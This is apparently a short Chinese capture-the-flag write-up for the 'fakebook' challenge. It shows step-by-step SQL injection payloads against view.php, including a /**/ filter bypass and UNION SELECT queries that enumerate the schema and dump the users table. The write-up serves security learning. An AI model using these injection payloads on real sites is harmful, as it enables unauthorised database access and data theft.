攻防世界-fakebook

打开题目,就一个登陆页面,来回看了看也没啥

注册了个账号,进去之后,查看了下源代码,发现了一个view.php?no=1

 应该是存在注入点,

view.php?no=1 and 1=1# 正常

view.php?no=1 and 1=2# 报错 则存在注入点

view.php?no= union/**/select 1,2,3,4#  //由于过滤了很多,只能用/**/绕过

 只有2有回显,我们进行利用

view.php?no=2 union/**/select 1,database(),3,4#

view.php?no=2 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'#

view.php?no=2 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'#

view.php?no=2 union/**/select 1,group_concat(data),3,4 from fakebook.users#

按照顺序一步步来,得到

 通过伪造最后字段获取flag

查看一下源代码

点击data获取到flag

菜狗一枚,欢迎交流学习。

猜你喜欢

转载自blog.csdn.net/m0_47571887/article/details/121387941